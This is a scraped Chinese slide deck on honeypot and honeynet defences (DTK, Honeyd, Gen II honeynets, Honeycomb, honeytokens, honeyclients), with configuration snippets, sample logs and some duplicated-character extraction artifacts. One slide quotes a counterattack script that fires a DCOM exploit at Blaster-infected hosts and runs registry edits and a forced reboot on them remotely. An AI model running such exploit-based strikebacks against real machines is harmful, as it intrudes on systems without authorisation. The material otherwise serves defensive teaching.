蜜罐与蜜网技术介绍-zhao-.ppt

资源描述

1、蜜罐与蜜网技术介绍1内容蜜罐技术的提出蜜罐技术蜜罐概念实例工具：DTK,honeyd蜜网技术蜜网概念、蜜网项目组实例工具：Gen II 蜜网蜜罐/蜜网技术的应用新概念和新方向2蜜罐技术的提出要解决什么问题？3互联网安全状况安全基础薄弱操作系统/软件存在大量漏洞安全意识弱、安全加强 rarely done任何主机都是攻击目标！DDoS、跳板攻击需要大量傀儡主机蠕虫、病毒的泛滥并不再仅仅为了炫耀4Hold your friends close,but your enemies closer.”_Michael Corleone:TheGodfather,Part II 5互联网安全状况(2)攻击者

2、不需要太多技术攻击工具的不断完善更多的目标：Linux、Windows更容易使用，工具整合Metasploit:30+Exploits更强力攻击脚本和工具可以很容易得到和使用0-day exploits:packetstorm团队协作6网络攻防的不对称博弈工作量不对称攻击方：夜深人静,攻其弱点防守方：24*7*365,全面防护信息不对称攻击方：通过网络扫描、探测、踩点对攻击目标全面了解防守方：对攻击方一无所知后果不对称攻击方：任务失败，极少受到损失防守方：安全策略被破坏，利益受损7蜜罐技术的提出扭转工作量不对称增加攻击代价假目标扭转信息不对称了解你的敌人！他们是谁？他们使用什么工具？如何操作？

3、为什么攻击你？扭转后果不对称防守方不受影响损失计算机取证对攻击方的威慑8蜜罐技术什么是蜜罐？蜜罐的发展历史Fred Cohen DTKHoneyd9蜜罐的概念Honeypot:首次出现在Cliff Stoll的小说“The Cuckoos Egg”(1990)蜜网项目组给出如下定义：“A security resource whos value lies in being probed,attacked or compromised”没有业务上的用途，因此所有流入/流出蜜罐的流量都预示着扫描、攻击及攻陷用以监视、检测和分析攻击10蜜罐与没有防护的PC的区别蜜罐是网络管理员经过周密布置而设下的“

4、黑匣子”，看似漏洞百出却尽在掌握之中，它收集的入侵数据十分有价值；没有防护的计算机是送给入侵者的礼物，即使被入侵也不一定查得到痕迹因此，蜜罐的定义是：“蜜罐是一个安全资源，它的价值在于被探测、攻击和损害。”11蜜罐的要求设计蜜罐的初衷就是让黑客入侵，借此收集证据，同时隐藏真实的服务器地址，因此我们要求一台合格的蜜罐拥有这些功能：发现攻击、产生警告、强大的记录能力、欺骗、协助调查。另外一个功能由管理员去完成，那就是在必要时候根据蜜罐收集的证据来起诉入侵者 12蜜罐技术的发展历史被攻陷的真实主机(1990)An Evening with Berferd虚拟蜜罐工具(1997)模拟网络服务，虚拟系统

5、Fred Cohen:DTK被监控的真实系统(2000)更多的数据捕获、分析、控制工具在一个蜜网的框架中蜜网项目组:Gen II蜜网13蜜罐的分类部署目标产品型研究型交互性：攻击者在蜜罐中活动的交互性级别低交互型高交互型14产品型蜜罐部署目标:保护单位网络防御检测帮助对攻击的响应需要网管尽可能少的工作商业产品KFSensor,Specter,ManTrap15研究型蜜罐部署目标：对黑客攻击进行捕获和分析这些“坏家伙”在干什么了解攻击方法捕获他们的键击记录捕获他们的攻击工具监控他们的会话需要大量时间和精力投入！实例：Gen II蜜网,Honeyd16低交互型蜜罐模拟服务和操作系统只能捕获少量信息

6、容易部署，减少风险实例：Specter,KFSensor,and Honeyd.17高交互型蜜罐提供真实的操作系统和服务，而不是模拟可以捕获更丰富的信息部署复杂，高安全风险实例：ManTrap,Gen II蜜网18蜜罐技术优势高保真高质量的小数据集很小的误报率很小的漏报率捕获新的攻击及战术并不是资源密集型简单19蜜罐技术弱势劳力/技术密集型局限的视图不能直接防护信息系统带来的安全风险20安全风险发现发现蜜罐蜜罐黑客知道要避免进入哪些系统向蜜罐反馈虚假、伪造的信息消除蜜罐的指纹蜜罐-反蜜罐技术：博弈问题!利用蜜罐攻利用蜜罐攻击击第三方第三方期望黑客获得蜜罐的root权限黑客会将其用作危害第三方的

7、跳板引入多层次的数据控制机制人为分析和干预21蜜罐工具实例DTKDeception Toolkit(1997)by Fred CohenFred Cohen,A Framework for Deception.HoneydA virtual honeypot frameworkHoneyd 1.0(Jan 22,2005)by Niels Provos,Google Inc.22DTK用户：普通互联网用户目标在几分钟内部署一系列的陷阱显著提高攻击代价，同时降低防御代价欺骗自动攻击程序，使其无效23从物理蜜罐到DTK24从物理蜜罐到DTK25DTK如何工作？模拟有漏洞的网络服务基于状态机变迁脚本

8、#State Input NexStat Exit ln/file output/filename0 START 011220 ESMTP Sendmail 8.1.2/8.1.3;0 ERROR 011500 Command unrecognized-please say Helo0 help 011214-No help available26效果及局限效果增大了攻击代价，增加攻击成功所需技术门槛让低水平的攻击者一头雾水通过日志可以了解攻击企图局限根据攻击者输入给出对应输出的方法过于简单所能够提供的欺骗手段有限27Honeyd可以模拟任意TCP/UDP网络服务IIS,Telnet,pop3

9、支持同时模拟多个IP地址主机经过测试，最多同时支持65535个IP地址支持ICMP对ping和traceroute做出响应通过代理和重定向支持对实际主机、网络服务的整合add windows tcp port 23 proxy“162.105.204.159 23”UI用户界面(v1.0)28Honeyd监控未使用IP地址29Honeyd设计上的考虑接收网络流量模拟蜜罐系统仅模拟网络协议栈层次，而不涉及操作系统各个层面可以模拟任意的网络拓扑Honeyd宿主主机的安全性限制对手只能在网络层面与蜜罐进行交互保证对手不会获得整个系统的访问权限捕获网络连接和攻击企图日志功能30接收网络流量Honeyd

10、模拟的蜜罐系统接收相应网络流量三种方式为Honeyd模拟的虚拟主机建立路由ARP代理支持网络隧道模式(GRE)31Honeyd体系框架配置数据库存储网络协议栈的个性化特征中央数据包分发器将输入的数据包分发到相应的协议处理器协议处理器个性化引擎可选路由构件32FTP服务模拟case$incmd_nocase in QUIT*)echo-e 221 Goodbye.rexit 0;SYST*)echo-e 215 UNIX Type:L8r;HELP*)echo-e 214-The following commands are recognized(*=s unimplemented).recho

11、-e USER PORT STOR MSAM*RNTO NLST MKD CDUPrecho-e PASS PASV APPE MRSQ*ABOR SITE XMKD XCUPrecho-e ACCT*TYPE MLFL*MRCP*DELE SYST RMD STOUrecho-e SMNT*STRU MAIL*ALLO CWD STAT XRMD SIZErecho-e REIN*MODE MSND*REST XCWD HELP PWD MDTMrecho-e QUIT RETR MSOM*RNFR LIST NOOP XPWDrecho-e 214 Direct comments to f

12、tp$domain.r;USER*)33个性化引擎为什么需要个性化引擎?不同的操作系统有不同的网络协议栈行为攻击者通常会运行指纹识别工具，如Xprobe和Nmap获得目标系统的进一步信息个性化引擎使得虚拟蜜罐看起来像真实的目标每个由Honeyd产生的包都通过个性化引擎引入操作系统特定的指纹，让Nmap/Xprobe进行识别使用Nmap指纹库作为TCP/UDP连接的参考使用Xprobe指纹库作为ICMP包的参考34路由拓扑结构Honeyd支持创建任意的网络拓扑结构对路由树的模拟配置一个路由进入点可配置链路时延和丢包率模拟任意的路由路径扩展将物理主机融合入模拟的网络拓扑通过GRE隧道模式支持分布式

13、部署35路由拓扑定义实例route entry 10.0.0.1route 10.0.0.1 add net 10.1.0.0/16 latency 55ms loss 0.1route 10.0.0.1 add net 10.2.0.0/16 latency 55ms loss 0.1route 10.1.0.1 link 10.1.0.0/16route 10.2.0.1 link 10.2.0.0/16create routeroneset routeone personality“Cisco 7206 router(IOS 11.1(17)”set routerone default

14、tcp action resetset routerone default udp action resetbind 10.0.0.1 routeronebind 10.1.0.1 routeronebind 10.2.0.1 routerone36日志功能Honeyd支持对网络活动的多种日志方式Honeyd对任何协议创建网络连接日志，报告试图发起的、或完整的网络连接在网络协议模拟实现中可以通过stderr进行相关信息收集Honeyd也可以与NIDS结合使用，捕获更多更全面的攻击信息37Feb 12 23:06:33 Connection to closed port:udp(210.35.1

15、28.1:1978-172.16.85.101:1978)Feb 12 23:23:40 Connection request:tcp(66.136.92.78:3269-172.16.85.102:25)Feb 12 23:23:40 Connection established:tcp(66.136.92.78:3269-172.16.85.102:25)sh scripts/smtp.shFeb 12 23:24:14 Connection dropped with reset:tcp(66.136.92.78:3269-172.16.85.102:25)Feb 12 23:34:53

16、Killing attempted connection:tcp(216.237.78.227:3297-172.16.85.102:80)Feb 12 23:39:14 Connection:udp(10.5.5.71:1026-172.16.85.101:137)Feb 12 23:39:14 Connection established:udp(10.5.5.71:1026-172.16.85.101:137)Wed Feb 12 23:23:40 UTC 2003:SMTP started from Port EHLO MAIL From:RCPT To:Honeyd的日志记录38蜜网

17、技术什么是蜜网？蜜网项目组Gen II蜜网技术39什么是蜜网？实质上是一种研究型、高交互型的蜜罐技术对攻击者活动进行收集一个体系框架包括一个或多个蜜罐高可控的蜜罐网络40虚拟蜜网在一台机器上部署蜜网的解决方案VMware&User Mode Linux优势减少部署成本更容易管理风险攻击虚拟系统软件，获得整个蜜网的控制权指纹41蜜网的需求数据控制降低风险使得蜜网不会被用以危害第三方数据捕获检测并捕获所有攻击者的活动数据分析分析攻击者做了什么！42蜜网项目组非赢利性研究机构目标To learn the tools,tactics,and motives of the blackhat commun

18、ity and share these lessons learned历史1999 非正式的邮件列表June 2000 演变为蜜网项目组Jan.2002 发起蜜网研究联盟Dec.2002 10个活跃的联盟成员蜜网项目组成员限制最多30人每个公司或组织同时最多2人创始人及主席Lance Spitzner(Sun Microsystems)43蜜网项目组规划Phase I:1999-2001Gen I蜜网技术:概念验证Phase II:2001-2003Gen II蜜网技术:成熟的蜜网技术方案Phase III:2003-2004HoneyWall Eeyore:可引导的CDROM，集成数据控制和

19、数据捕获工具Phase IV:2004-2005对分布式的蜜网捕获的数据进行收集和关联的集中式系统 kangaPhase V:2005-Data Analysis Framework WalleyeNew HoneyWall CDROM Roo(2005年5月1日发布)44Gen II 蜜网技术Gen II 蜜网框架45没有数据控制46数据控制47iptables处理流程48snort_inlineiptables-A FORWARD-i$LAN_IFACE-m state -state RELATED,ESTABLISHED-j QUEUE49Snort logging01/08-10:06

20、:09.729583 *111:10:1(spp_stream4)STEALTH ACTIVITY(XMAS scan)detection*TCP 10.10.10.3:46271-10.10.10.10:150iptables connection loggingJan 8 09:52:43 honeywall user.warn klogd:INBOUND ICMP:IN=br0OUT=br0 PHYSIN=eth0 PHYSOUT=eth1 SRC=10.10.10.3 DST=10.10.10.10 LEN=84TOS=0 x00 PREC=0 x00 TTL=6451snort_in

21、line logging03/23-21:21:05.915340*1:0:0 Dropping Telnet connection*Priority:0 TCP 10.10.10.10:39528-192.168.1.20:2303/23-21:21:24.054533*1:0:0 Modifying HTTP GET command*Priority:0 TCP 10.10.10.10:38533-192.168.1.20:8052Sebek*Keystroke Logging*Sebek is developed by Ed Balas,Indiana University53Looki

22、ng at Keystrokes54Gen II 蜜网技术数据捕获IPTableseth0Snort_inlineIPTableseth1Snort for SniffSebek ClientHoneyWallHoneypotSebek ClientHoneypotSwatchSystem Activity ReportSebek SvrFirewall LogAll Trafficeth2AdministratorBlind to black-hatsSystem Activity55Gen II 蜜网技术数据控制IPTableseth0Snort_inlineIPTableseth1S

23、nort for SniffSebek ClientHoneyWallHoneypotSebek ClientHoneypotSwatchSebek SvrFirewall LogAlerteth2AdministratorBlind to black-hatsDropDisableOutbound Known AttacksConnection LimitingProbe,DoS Attacks56蜜网研究联盟近期的一些发现Know Your Enemy-Trend AnalysisTrend:Life expectancy increasing for unpatched or vulne

24、rable Linux deployments.Know Your Enemy-A Profile Profile:Automated Credit Card FraudKnow your Enemy-Tracking BotnetsUsing honeynets to learn more about Bots 57蜜罐/蜜网技术的应用蜜罐 V.S.蠕虫Capture SpammersHoneycomb58蜜罐 V.S.蠕虫Snipe Blaster Worm-Oudotcreate default set default personality Windows XP Pro add def

25、ault tcp port 135 open add default tcp port 4444/bin/sh scripts/strikeback.sh$ipsrc set default tcp action block set default udp action block!#/bin/sh#Launches a DCOM exploit toward the infected attacking host#and then run cleaning commands in the remote DOS shell obtained./dcom_exploit-d$1 c:cleane

26、rMSB.reg echo HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun c:cleanerMSB.regecho auto windows update=REM msblast.exe c:cleanerMSB.reg regedit/s c:cleanerMSB.reg del/f c:cleanerMSB.regREM N)Specific actions to update the Windows host could be added hereREM N+1)Reboot the hostshutdown-r-

27、f-t 0 exit EOF59Using honeyd to capture spammersSpam preventionSpammers abuse two Internet services proxy servers and open mail relays.To understand how spammers operate we use the Honeyd framework to instrument networks with open proxy servers and open mail relays.Use of Honeyds GRE tunneling capab

28、ilities and tunnel several C-class networks to a central Honeyd host.Using the Honeyd framework,it is possible to instrument networks to automatically capture spam and submit it to collaborative filtering systems.60HoneycombHoneycomb 利用蜜罐技术自动分析入侵检测特征2004 SIGCOMM PaperUniversity of Cambridge Computer

29、 Laboratory,UK61Honeycomb体系框架62Honeycomb特征自动生成算法63水平、垂直模式检测64Honeycomb 实验结果65新概念和新方向Activate honeypotshoneyfarmhoneytokenhoneyapphoneyclient66主动式蜜罐技术动态蜜罐即插即用的解决方案自动调整被动指纹识别技术了解所处的网络环境动态配置虚拟蜜罐67Honeyfarm基本思想68重定向机制对高价值目标映射蜜罐系统动态蜜罐技术不需创建新的目标，而使用已存在的目标将恶意的、未经授权的活动重定向到蜜罐监视和捕获攻击者在蜜罐中的活动计算机取证技术69什么时候重定向？非

30、预期的流量 Hot Zoning非业务(Non-production)目标端口非业务源端口Time of day已知攻击 Bait-n-SwitchSnort的修改版本，内联网关将检测到的活动重定向到蜜罐中基于主机的监控监控主机上的未授权活动、或恶意活动,然后重定向:PaX,Systrace70重定向示例71蜜罐的欺骗性真实的系统环境系统标识IP、traceroute路径主机名、操作系统内核版本系统配置和应用程序开放的网络服务安装的应用程序数据内容Proxy and cache?优势：在一个高度可控的环境中愚弄/观察攻击者的所有行动72Honeytoken概念出发点：威胁不仅仅是针对信息系统，

31、也针对信息本身.Honeytoken:正常情况不会使用的一些诱饵信息数据库诱饵记录伪造的弱用户名/口令对如果Honeytoken一旦被访问,预示着攻击发生,对它进行监视跟踪73HoneyappHoneyapp:应用层的蜜罐模拟应用层的服务对非自动化的攻击更具吸引力在应用层能够更有效地对攻击进行分析实例Web application honeypot74Honeyclient越来越多的攻越来越多的攻击针对击针对客客户户端端软软件件Web浏览浏览器器Email客客户户端端Honeyclient的的设计设计要考要考虑虑：应应用用协议协议本身本身需要捕需要捕获获的攻的攻击击基于完整性基于完整性测试测试

32、判断是否遭受攻判断是否遭受攻击击程序本身程序本身配置文件、注册表等配置文件、注册表等分分类类Active honeyclient:同步交互，如同步交互，如web-based honeyclientPassive honeyclient:异步交互，如异步交互，如email honeyclient75Web-based honeyclient目标找到危害浏览器的网站及攻击方式找到恶意站点：Google捕捉并分析攻击方法安装IRC bot，成为傀儡主机安装代理服务安装spyware/adware，或其他恶意代码获取敏感信息，如信用卡号码、身份信息Phishing website76异步交互honeyclient基于IRC的honeyclient,加入特定的IRC channel,获取信息Germany Honeynet Project Drone基于IM软件的honeyclient基于Email的honeyclientPhishing mailp2p based honeyclient从p2p网络中下载软件并执行77谢谢！78

展开阅读全文